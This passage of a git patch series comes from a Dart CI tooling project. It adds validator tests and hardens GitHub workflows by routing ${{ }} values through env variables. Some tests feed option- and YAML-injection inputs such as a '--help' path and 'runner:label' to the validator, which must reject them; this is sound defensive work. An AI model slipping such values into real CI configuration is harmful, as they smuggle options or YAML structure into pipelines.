'{"type":"testStart","test":{"id":11,"name":"visible pass"},"time":21}', + '{"type":"testDone","testID":11,"result":"success","hidden":false,"skipped":false,"time":30}', + '{"type":"done","time":30}', + ].join('\n'), + ); + + final results = TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.passed, equals(1)); + expect(results.failed, equals(0)); + expect(results.failures, isEmpty); + }); + }); + + group('TestResultsUtil.writeTestJobSummary', () { + TestResults _parsed({ + required int passed, + required int failed, + required int skipped, + int durationMs = 500, + }) { + final results = TestResults() + ..parsed = true + ..passed = passed + ..failed = failed + ..skipped = skipped + ..totalDurationMs = durationMs; + return results; + } + + test( + 'emits NOTE when parsed results are successful and exit code is 0', + () { + String? summary; + final results = _parsed(passed: 3, failed: 0, skipped: 1); + + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux-x64', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux-x64')); + expect(summary!, contains('> [!NOTE]')); + expect(summary!, contains('All 4 tests passed')); + }, + ); + + test( + 'emits CAUTION when exit code is non-zero even if failed count is zero', + () { + String? summary; + final results = _parsed(passed: 2, failed: 0, skipped: 0); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux ', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux <x64>')); + expect(summary!, contains('> [!CAUTION]')); + expect( + summary!, + contains( + 'Tests exited with code 1 despite no structured test failures.', + ), + ); + }, + ); + + test('emits CAUTION for unparsed results with non-zero exit code', () { + String? 
summary; + final results = TestResults(); // parsed=false by default + + TestResultsUtil.writeTestJobSummary( + results, + 7, + platformId: 'runner', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('> [!CAUTION]')); + expect( + summary!, + contains( + 'Tests failed (exit code 7) — no structured results available.', + ), + ); + }); + + test('emits NOTE for unparsed results with zero exit code', () { + String? summary; + final results = TestResults(); // parsed=false by default + + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'runner', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('> [!NOTE]')); + expect( + summary!, + contains( + 'Tests passed (exit code 0) — no structured results available.', + ), + ); + }); + + test('emits CAUTION when parsed results contain failures', () { + String? summary; + final results = _parsed(passed: 1, failed: 1, skipped: 0); + results.failures.add( + TestFailure( + name: 'failing test', + error: 'boom', + stackTrace: 'trace', + printOutput: '', + durationMs: 12, + ), + ); + + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('> [!CAUTION]')); + expect(summary!, contains('1 of 2 tests failed')); + expect(summary!, contains('### Failed Tests')); + expect(summary!, contains('failing test')); + }); + + test('truncates failure details after 20 entries in summary', () { + String? 
summary; + final results = _parsed(passed: 0, failed: 25, skipped: 0); + for (var i = 0; i < 25; i++) { + results.failures.add( + TestFailure( + name: 'failing test $i', + error: 'boom $i', + stackTrace: 'trace $i', + printOutput: '', + durationMs: i, + ), + ); + } + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect( + summary!, + contains( + '_...and 5 more failures. See test logs artifact for full details._', + ), + ); + expect(summary!, isNot(contains('failing test 24'))); + }); + }); +} diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index 7dbb9f9..2b0c8a9 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -2,6 +2,7 @@ import 'dart:convert'; import 'dart:io'; import 'package:test/test.dart'; +import 'package:yaml/yaml.dart'; import 'package:runtime_ci_tooling/src/cli/utils/workflow_generator.dart'; @@ -270,6 +271,34 @@ void main() { ); expect(errors.where((e) => e.contains('secrets')), isEmpty); }); + + test('secrets key with hyphen produces error (unsafe identifier)', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'API-KEY': 'SOME_SECRET'}), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('secrets key starting with digit produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'1API_KEY': 'SOME_SECRET'}), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('secrets value with hyphen produces error (unsafe secret name)', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'API_KEY': 'SOME-SECRET'}), + ); + expect(errors, anyElement(contains('safe secret name'))); + }); + + test('secrets key and value with underscore pass', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'API_KEY': 
'MY_SECRET_NAME'}), + ); + expect(errors.where((e) => e.contains('secrets')), isEmpty); + }); }); // ---- personal_access_token_secret ---- @@ -301,6 +330,30 @@ void main() { isEmpty, ); }); + + test('pat with hyphen produces error (unsafe identifier)', () { + final errors = WorkflowGenerator.validate( + _validConfig(pat: 'MY-PAT'), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('pat with special chars produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(pat: r'MY_PAT$'), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('pat GITHUB_TOKEN passes', () { + final errors = WorkflowGenerator.validate( + _validConfig(pat: 'GITHUB_TOKEN'), + ); + expect( + errors.where((e) => e.contains('personal_access_token_secret')), + isEmpty, + ); + }); }); // ---- line_length ---- @@ -328,6 +381,54 @@ void main() { final errors = WorkflowGenerator.validate(_validConfig()); expect(errors.where((e) => e.contains('line_length')), isEmpty); }); + + test('string line_length "abc" produces error (must be numeric)', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: 'abc'), + ); + expect(errors, anyElement(contains('must be numeric'))); + }); + + test('string line_length with leading/trailing whitespace produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: ' 120 '), + ); + expect(errors, anyElement(contains('whitespace'))); + }); + + test('string line_length with embedded newline produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: '12\n0'), + ); + expect(errors, anyElement(contains('newlines or control'))); + }); + + test('string line_length "0" produces error (out of range)', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: '0'), + ); + expect(errors, anyElement(contains('between 1 and 10000'))); + }); + + test('string line_length "10001" produces error (out of 
range)', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: '10001'), + ); + expect(errors, anyElement(contains('between 1 and 10000'))); + }); + + test('int line_length 0 produces error (out of range)', () { + final errors = WorkflowGenerator.validate(_validConfig(lineLength: 0)); + expect(errors, anyElement(contains('between 1 and 10000'))); + }); + + test('int line_length 10001 produces error (out of range)', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: 10001), + ); + expect(errors, anyElement(contains('between 1 and 10000'))); + }); }); // ---- sub_packages (Issue #9 validation) ---- @@ -371,6 +472,17 @@ void main() { expect(errors, anyElement(contains('name must be a non-empty string'))); }); + test('sub_packages with name containing unsupported characters produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo bar', 'path': 'packages/foo'}, + ], + ), + ); + expect(errors, anyElement(contains('name contains unsupported characters'))); + }); + test('sub_packages with missing path produces error', () { final errors = WorkflowGenerator.validate( _validConfig( @@ -446,6 +558,28 @@ void main() { expect(errors, anyElement(contains('must be a relative repo path'))); }); + test('sub_packages path "." 
(repo root) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '.'}, + ], + ), + ); + expect(errors, anyElement(contains('must not be repo root'))); + }); + + test('sub_packages path starting with "-" produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '--help'}, + ], + ), + ); + expect(errors, anyElement(contains('must not start with "-"'))); + }); + test('sub_packages path with backslashes produces error', () { final errors = WorkflowGenerator.validate( _validConfig( @@ -580,12 +714,56 @@ void main() { expect(errors, anyElement(contains('must be a non-empty string'))); }); + test('runner_overrides value with surrounding whitespace produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(runnerOverrides: {'ubuntu': ' custom-runner '}), + ); + expect(errors, anyElement(contains('leading/trailing whitespace'))); + }); + test('valid runner_overrides passes', () { final errors = WorkflowGenerator.validate( _validConfig(runnerOverrides: {'ubuntu': 'custom-runner-label'}), ); expect(errors.where((e) => e.contains('runner_overrides')), isEmpty); }); + + test('runner_overrides value with newline produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(runnerOverrides: {'ubuntu': 'runner\nlabel'}), + ); + expect(errors, anyElement(contains('newlines, control chars'))); + }); + + test('runner_overrides value with tab produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(runnerOverrides: {'ubuntu': 'runner\tlabel'}), + ); + expect(errors, anyElement(contains('newlines, control chars'))); + }); + + test('runner_overrides value with YAML-injection char produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(runnerOverrides: {'ubuntu': 'runner:label'}), + ); + expect(errors, anyElement(contains('unsafe YAML chars'))); + }); + + 
test('runner_overrides value with dollar sign produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(runnerOverrides: {'ubuntu': r'runner$label'}), + ); + expect(errors, anyElement(contains('unsafe YAML chars'))); + }); + + test('runner_overrides value with hyphen and dot passes', () { + final errors = WorkflowGenerator.validate( + _validConfig( + runnerOverrides: {'ubuntu': 'runtime-ubuntu-24.04-x64-256gb'}, + ), + ); + expect(errors.where((e) => e.contains('runner_overrides')), isEmpty); + }); }); // ---- web_test ---- @@ -750,6 +928,17 @@ void main() { }, ); + test('web_test.paths with single quote produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ["test/web/foo'bar_test.dart"], + }, + ), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + test('web_test.paths duplicate (after normalization) produces error', () { final errors = WorkflowGenerator.validate( _validConfig( @@ -806,6 +995,28 @@ void main() { expect(errors, anyElement(contains('must be a relative repo path'))); }); + test('web_test.paths "." 
(repo root) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ['.'], + }, + ), + ); + expect(errors, anyElement(contains('must not be repo root'))); + }); + + test('web_test.paths starting with "-" produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ['--help'], + }, + ), + ); + expect(errors, anyElement(contains('must not start with "-"'))); + }); + test('web_test.paths with newline produces error', () { final errors = WorkflowGenerator.validate( _validConfig( @@ -1044,7 +1255,7 @@ void main() { final errors = WorkflowGenerator.validate({ // missing dart_sdk, missing features }); - expect(errors.length, greaterThanOrEqualTo(2)); + expect(errors.length, equals(2)); expect(errors, anyElement(contains('dart_sdk'))); expect(errors, anyElement(contains('features'))); }); @@ -1150,16 +1361,27 @@ void main() { Map _minimalValidConfig({ bool webTest = false, Map? webTestConfig, + Map? featureOverrides, + List? platforms, }) { + final features = { + 'proto': false, + 'lfs': false, + 'format_check': false, + 'analysis_cache': false, + 'managed_analyze': false, + 'managed_test': false, + 'build_runner': false, + 'web_test': webTest, + }; + if (featureOverrides != null) { + features.addAll(featureOverrides); + } + features['web_test'] = webTest; return _validConfig( dartSdk: '3.9.2', - features: { - 'proto': false, - 'lfs': false, - 'format_check': false, - 'web_test': webTest, - }, - platforms: ['ubuntu'], + features: features, + platforms: platforms ?? 
['ubuntu'], webTest: webTestConfig, ); } @@ -1283,6 +1505,7 @@ void main() { final rendered = gen.render(); expect(rendered, contains("'test/web/foo_test.dart'")); expect(rendered, contains('--concurrency=2')); + expect(rendered, contains('-- \'test/web/foo_test.dart\'')); }); test( @@ -1299,5 +1522,160 @@ void main() { expect(rendered, contains('--concurrency=32')); }, ); + + test('rendered output parses as valid YAML with jobs map', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final jobs = parsed['jobs'] as YamlMap; + expect(jobs.containsKey('pre-check'), isTrue); + }); + + test('feature flags render expected snippets', () { + final cases = >[ + {'feature': 'proto', 'snippet': 'Install protoc'}, + {'feature': 'lfs', 'snippet': 'lfs: true'}, + {'feature': 'format_check', 'snippet': 'auto-format:'}, + {'feature': 'analysis_cache', 'snippet': 'Cache Dart analysis'}, + {'feature': 'managed_analyze', 'snippet': 'runtime_ci_tooling:manage_cicd analyze'}, + {'feature': 'managed_test', 'snippet': 'runtime_ci_tooling:manage_cicd test'}, + {'feature': 'build_runner', 'snippet': 'Run build_runner'}, + ]; + + for (final c in cases) { + final feature = c['feature']!; + final snippet = c['snippet']!; + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {feature: true}), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains(snippet), reason: 'Feature "$feature" should render "$snippet".'); + } + }); + + test('build_runner=false omits build_runner step', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'build_runner': false}), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, isNot(contains('Run build_runner'))); + }); + + test('multi-platform render emits analyze + matrix test 
jobs', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(platforms: ['ubuntu', 'macos']), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final jobs = parsed['jobs'] as YamlMap; + + expect(jobs.containsKey('analyze'), isTrue); + expect(jobs.containsKey('test'), isTrue); + expect(jobs.containsKey('analyze-and-test'), isFalse); + + final testJob = jobs['test'] as YamlMap; + final strategy = testJob['strategy'] as YamlMap; + final matrix = strategy['matrix'] as YamlMap; + final include = matrix['include'] as YamlList; + expect(include.length, equals(2)); + }); + + // ---- render(existingContent) / _preserveUserSections ---- + group('render(existingContent) preserves user sections', () { + test('user section content is preserved when existingContent has custom lines in a user block', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + // Append a user block with content so extraction finds it (first occurrence is empty) + const customBlock = ''' +# --- BEGIN USER: pre-test --- + - name: Custom pre-test step + run: echo "user-added" +# --- END USER: pre-test --- +'''; + final existing = base + customBlock; + final rendered = gen.render(existingContent: existing); + expect(rendered, contains('Custom pre-test step')); + expect(rendered, contains('user-added')); + expect(rendered, contains('# --- BEGIN USER: pre-test ---')); + expect(rendered, contains('# --- END USER: pre-test ---')); + }); + + test('CRLF normalization: existing content with \\r\\n still preserves sections', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + const customContent = '\r\n - run: echo "crlf-test"\r\n'; + final existing = base.replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: 
pre-test ---$customContent# --- END USER: pre-test ---', + ); + final rendered = gen.render(existingContent: existing); + expect(rendered, contains('crlf-test')); + expect(rendered, contains('# --- BEGIN USER: pre-test ---')); + }); + + test('multiple user sections preserve independently', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + var existing = base; + existing = existing.replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: pre-test ---\n - run: echo pre\n# --- END USER: pre-test ---', + ); + existing = existing.replaceFirst( + '# --- BEGIN USER: post-test ---\n# --- END USER: post-test ---', + '# --- BEGIN USER: post-test ---\n - run: echo post\n# --- END USER: post-test ---', + ); + existing = existing.replaceFirst( + '# --- BEGIN USER: extra-jobs ---\n# --- END USER: extra-jobs ---', + '# --- BEGIN USER: extra-jobs ---\n custom-job:\n runs-on: ubuntu-latest\n# --- END USER: extra-jobs ---', + ); + final rendered = gen.render(existingContent: existing); + expect(rendered, contains('echo pre')); + expect(rendered, contains('echo post')); + expect(rendered, contains('custom-job:')); + expect(rendered, contains('runs-on: ubuntu-latest')); + }); + + test('empty/whitespace-only existing user section does not overwrite rendered section', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + // Existing has pre-test with only whitespace; post-test has real content + final existing = base + .replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: pre-test ---\n \n \t \n# --- END USER: pre-test ---', + ) + .replaceFirst( + '# --- BEGIN USER: post-test ---\n# --- END USER: post-test ---', + '# --- BEGIN USER: post-test ---\n - run: echo kept\n# --- END USER: post-test ---', + ); + final rendered = 
gen.render(existingContent: existing); + // pre-test: whitespace-only was skipped, so rendered keeps empty placeholder + expect( + rendered, + contains('# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---'), + ); + // post-test: real content was preserved + expect(rendered, contains('echo kept')); + }); + }); }); } From 62e9c5a97166e0ba116ae90aec35b8397c5547f0 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 20:46:36 -0500 Subject: [PATCH 08/16] fix: broaden CI dart formatting and safe staging Format checks now run across the repository and stage only tracked *.dart changes, preventing unrelated files from being committed while still capturing non-lib Dart edits. Regenerated workflow templates and synced related docs/template metadata. --- .github/workflows/ci.yaml | 6 +- .github/workflows/issue-triage.yaml | 14 +- .github/workflows/release.yaml | 186 +++++++++++--------- .runtime_ci/template_versions.json | 20 +-- USAGE.md | 4 +- templates/config.json | 3 +- templates/github/workflows/ci.skeleton.yaml | 4 +- 7 files changed, 133 insertions(+), 104 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index ac6ba13..b32b0e0 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -57,7 +57,7 @@ jobs: sdk: "3.9.2" - name: Format code - run: dart format --line-length 120 lib/ + run: dart format --line-length 120 . - name: Commit and push formatting id: format-push @@ -65,7 +65,7 @@ jobs: if ! 
git diff --quiet; then git config user.name "github-actions[bot]" git config user.email "41898282+github-actions[bot]@users.noreply.github.com" - git add lib/ + git add -u -- '*.dart' git commit -m "bot(format): apply dart format --line-length 120 [skip ci]" if git push; then echo "sha=$(git rev-parse HEAD)" >> "$GITHUB_OUTPUT" @@ -174,6 +174,7 @@ jobs: key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- + # ── shared:proto-setup ── keep in sync with single_platform ── # ── shared:pub-get ── keep in sync with single_platform ── - run: dart pub get env: @@ -192,7 +193,6 @@ jobs: set -o pipefail mkdir -p "$TEST_LOG_DIR" dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" - exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs PLATFORM_ID: ${{ matrix.platform_id }} diff --git a/.github/workflows/issue-triage.yaml b/.github/workflows/issue-triage.yaml index 80c74f4..3924e03 100644 --- a/.github/workflows/issue-triage.yaml +++ b/.github/workflows/issue-triage.yaml @@ -50,12 +50,13 @@ jobs: - name: Configure Git for HTTPS with Token if: steps.trigger.outputs.run == 'true' shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config 
--global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 if: steps.trigger.outputs.run == 'true' @@ -93,4 +94,5 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - run: dart run runtime_ci_tooling:triage_cli ${{ github.event.issue.number }} + ISSUE_NUMBER: ${{ github.event.issue.number }} + run: dart run runtime_ci_tooling:triage_cli "$ISSUE_NUMBER" diff --git a/.github/workflows/release.yaml b/.github/workflows/release.yaml index 2f1b797..1f693b9 100644 --- a/.github/workflows/release.yaml +++ b/.github/workflows/release.yaml @@ -69,12 +69,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config 
--global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -142,12 +143,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -180,17 +182,19 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run runtime_ci_tooling:manage_cicd triage pre-release \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ - --version "${{ needs.determine-version.outputs.new_version }}" + --prev-tag "$PREV_TAG" \ + --version "$NEW_VERSION" # Find manifest from .runtime_ci/runs/ audit trail MANIFEST=$(find .runtime_ci/runs -name 
"issue_manifest.json" -type f 2>/dev/null | sort -r | head -1) if [ -n "$MANIFEST" ]; then cp "$MANIFEST" /tmp/issue_manifest.json else - echo '{"version":"${{ needs.determine-version.outputs.new_version }}","github_issues":[],"sentry_issues":[],"cross_repo_issues":[]}' > /tmp/issue_manifest.json + echo "{\"version\":\"${NEW_VERSION}\",\"github_issues\":[],\"sentry_issues\":[],\"cross_repo_issues\":[]}" > /tmp/issue_manifest.json fi - uses: actions/upload-artifact@v6.0.0 @@ -223,12 +227,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -266,10 +271,12 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run 
runtime_ci_tooling:manage_cicd explore \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ - --version "${{ needs.determine-version.outputs.new_version }}" + --prev-tag "$PREV_TAG" \ + --version "$NEW_VERSION" - name: Create fallback stage1 artifacts if missing run: | @@ -311,12 +318,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -359,19 +367,23 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run runtime_ci_tooling:manage_cicd compose \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ - --version "${{ needs.determine-version.outputs.new_version }}" + --prev-tag "$PREV_TAG" \ + --version 
"$NEW_VERSION" - name: Documentation update env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run runtime_ci_tooling:manage_cicd documentation \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ - --version "${{ needs.determine-version.outputs.new_version }}" + --prev-tag "$PREV_TAG" \ + --version "$NEW_VERSION" - uses: actions/upload-artifact@v6.0.0 with: @@ -410,12 +422,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - name: Set up Dart uses: dart-lang/setup-dart@v1.7.1 @@ -510,12 +523,13 @@ jobs: - name: Configure Git for HTTPS with 